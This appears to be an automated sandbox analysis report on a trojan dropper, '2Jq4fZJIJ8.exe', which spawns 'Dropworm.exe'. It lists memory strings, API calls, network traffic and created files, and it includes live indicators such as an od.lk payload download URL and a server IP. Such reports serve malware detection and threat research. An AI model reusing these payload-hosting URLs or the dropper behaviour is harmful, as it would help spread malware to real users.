            Source: Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.starfieldtex
            Source: Dropworm.exe, Dropworm.exe, 00000009.00000000.1699005074.0000000000409000.00000008.00000001.01000000.0000000E.sdmp, Dropworm.exe, 00000009.00000002.2047393619.0000000000409000.00000004.00000001.01000000.0000000E.sdmp, Dropworm.exe, 0000000C.00000002.2429535829.0000000000409000.00000008.00000001.01000000.0000000E.sdmp, 2Jq4fZJIJ8.exe, Dropworm.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: 2Jq4fZJIJ8.exe, Dropworm.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.star
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/08
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0;
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtech.com/0F
            Source: Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starfieldtechZ
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.starz
            Source: Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.000000000342F000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://certs.starfieldtech.com/repository/0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904152654.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036442740.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2219815466.0000000003423000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/04c
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/211
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.2162639450.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1997320279.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2072754690.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/?
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033D6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663768139.00000000033DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/AppData
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003423000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/C
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/H
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/M:
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/T
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin)
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin-
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin.
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin2
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin:
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bin=
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binF
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binH
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.000000000338C000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binM
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binP
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1945858799.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binU
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binm
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binq
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033A3000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.binr
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/d/MzdfMzIxNzQ4Mzhf/WbUFEtl105.bins
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/em32
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2147922516.000000000342D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/f/MzdfMzIxNzQ4MzhfWGo3SW8?file_error=File
            Source: Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/l
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/o
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/od.lk/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/or/
            Source: Dropworm.exe, 0000000C.00000002.2433018640.00000000033C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://od.lk/ws
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1904180717.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/branding.json?user_id=2104337
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/download/file.json/MzdfMzIxNzQ4MzhfWGo3SW8?test=1&inline=0
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433018640.0000000003412000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.opendrive.com/api/file/info.json/MzdfMzIxNzQ4MzhfWGo3SW8?sharing_id=
            Source: 2Jq4fZJIJ8.exe, 00000008.00000003.1971631485.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1663721780.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2036334999.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000002.2432572239.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1817986444.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2136016965.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.1753723572.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, 2Jq4fZJIJ8.exe, 00000008.00000003.2194439736.00000000033CF000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000003.2178764189.000000000341C000.00000004.00000020.00020000.00000000.sdmp, Dropworm.exe, 0000000C.00000002.2433540354.00000000050C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.opendrive.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49720 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49738 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 38.108.185.115:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405050
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004030D9
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004030D9
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Windows\resources\0809\Godtager22Jump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_004063440_2_00406344
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_0040488F0_2_0040488F
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_004063448_2_00406344
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_0040488F8_2_0040488F
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_004063449_2_00406344
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_0040488F9_2_0040488F
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nseAD0E.tmp\System.dll 98BCD1DD88642F4DD36A300C76EBB1DDFBBBC5BFC7E3B6D7435DC6D6E030C13B
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: String function: 00402A3A appears 52 times
            Source: 2Jq4fZJIJ8.exeStatic PE information: invalid certificate
            Source: 2Jq4fZJIJ8.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.evad.winEXE@6/17@1/1
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030D9
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 8_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_004030D9
            Source: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exeCode function: 9_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_004030D9
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_0040431C GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,LdrInitializeThunk,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040431C
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeCode function: 0_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,0_2_0040205E
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Users\user\kompatibleJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile created: C:\Users\user\AppData\Local\Temp\nsnDDE5.tmpJump to behavior
            Source: 2Jq4fZJIJ8.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 2Jq4fZJIJ8.exeVirustotal: Detection: 65%
            Source: 2Jq4fZJIJ8.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeFile read: C:\Users\user\Desktop\2Jq4fZJIJ8.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: C:\Users\user\Desktop\2Jq4fZJIJ8.exeProcess created: C:\Users\user\Desktop\2Jq4fZJIJ8.exe "C:\Users\user\Desktop\2Jq4fZJIJ8.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe "C:\Users\user\AppData\Local\Temp\Kunderegistrets\Dropworm.exe"
